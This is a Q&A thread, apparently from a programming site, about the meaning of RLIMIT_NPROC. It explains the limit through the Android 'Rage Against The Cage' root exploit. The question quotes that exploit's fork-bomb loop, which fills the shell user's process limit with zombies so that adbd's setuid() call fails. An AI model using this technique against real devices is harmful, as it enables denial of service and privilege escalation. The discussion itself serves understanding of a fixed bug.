What is the correct definition of RLIMIT_NPROC?

Question

I'm looking at the implementation of the Android exploit Rage Against The Cage. The idea is to create as many processes as needed to reach RLIMIT_NPROC for the shell UID, so that the next time the Android Debug Bridge (ADB) daemon tries to drop its privileges from root to shell, the call to setuid() fails and the daemon keeps running as root. (That bug has since been fixed by checking the result of setuid() before proceeding.)

According to the setrlimit() documentation, RLIMIT_NPROC is defined as:

The maximum number of processes (or, more precisely on Linux, threads) that can be created [emphasis mine] for the real user ID of the calling process. Upon encountering this limit, fork(2) fails with the error EAGAIN. This limit is not enforced for processes that have either the CAP_SYS_ADMIN or the CAP_SYS_RESOURCE capability.

Moreover, this is how the exploit was implemented:

/* generate many (zombie) shell-user processes so restarting
 * adb's setuid() will fail.
 * The whole thing is a bit racy, since when we kill adb
 * there is one more process slot left which we need to
 * fill before adb reaches setuid(). Thats why we fork-bomb
 * in a seprate process.
 */
if (fork() == 0) { // 'true' for the child
  close(pepe[0]);
  for (;;) {
    if ((p = fork()) == 0) {
      exit(0); // child exits (???)
    } else if (p < 0) {
      if (new_pids) {
        printf("\n[+] Forked %d childs.\n", pids);
        new_pids = 0;
        write(pepe[1], &c, 1);
        close(pepe[1]);
      }
    } else {
      ++pids;
    }
  }
}

So RLIMIT_NPROC is defined as the "maximum number of processes that can be created" (created, not "executing at the same time"), and the implementation seems to agree with that definition, since every child created by the second fork() terminates immediately.

First of all, I can't see how limiting the number of processes created per UID could possibly work (we'd have to restart our machines from time to time to reset that count, wouldn't we?). Second, even the person who reverse engineered the exploit, and obtained an implementation equivalent to the one shown above, defines RLIMIT_NPROC differently:

It [the exploit] takes advantage of RLIMIT_NPROC max, which is a value that defines how many processes a given UID can have running.

That said, how does RLIMIT_NPROC actually work? Which definition is more precise?

score 1 · Answer 1 · answered Jul 05 '16 at 21:33

The limit is indeed the number of current processes, not the total number of processes created since the system started.

The key to how the exploit code works is zombie processes. Even though the child processes have called exit(), the kernel keeps their process-table entries around, and they count toward the limit until the parent either reaps them with wait() or exits itself. In this case the parent never calls wait(), so the zombies hang around until the parent itself exits.
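To see the zombie behaviour in isolation, here is a minimal sketch (not taken from the exploit). It assumes Linux with /proc mounted, and the names proc_state and zombie_demo are made up for illustration. It forks one child that exits immediately, checks the child's state before and after reaping, and does not touch RLIMIT_NPROC itself.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: read the one-letter state of a process from
 * /proc/<pid>/stat (Linux-only). Returns '?' if it cannot be read. */
static char proc_state(pid_t pid)
{
    char path[64];
    char buf[512];
    char state = '?';

    snprintf(path, sizeof path, "/proc/%d/stat", (int)pid);
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return '?';
    /* Line format: "pid (comm) state ..."; the state letter follows
     * the last ')' so that odd command names do not confuse us. */
    if (fgets(buf, sizeof buf, f) != NULL) {
        char *close_paren = strrchr(buf, ')');
        if (close_paren != NULL && close_paren[1] == ' ' && close_paren[2] != '\0')
            state = close_paren[2];
    }
    fclose(f);
    return state;
}

/* Hypothetical demo: fork a child that exits at once, then report its
 * state before reaping and whether it is gone afterwards.
 * Returns 0 on success, -1 on error. */
static int zombie_demo(char *state_before, int *gone_after)
{
    /* Make sure SIGCHLD is not ignored, otherwise exited children
     * are discarded automatically and never become zombies. */
    signal(SIGCHLD, SIG_DFL);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(0);                       /* child: terminate immediately */

    /* Block until the child has exited, but leave it unreaped (WNOWAIT). */
    siginfo_t info;
    if (waitid(P_PID, (id_t)pid, &info, WEXITED | WNOWAIT) < 0)
        return -1;

    *state_before = proc_state(pid);    /* 'Z' is expected here on Linux */

    /* Reap the child; only now is its process-table entry released. */
    if (waitpid(pid, NULL, 0) < 0)
        return -1;

    /* kill(pid, 0) sends no signal, it only probes whether pid exists. */
    *gone_after = (kill(pid, 0) == -1 && errno == ESRCH);
    return 0;
}
```

Calling zombie_demo(&state, &gone) from main should leave state set to 'Z' and gone set to 1: the child has already exited but still holds a process slot until the parent reaps it. The exploit's fork loop relies on the same effect, repeated until fork() fails.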
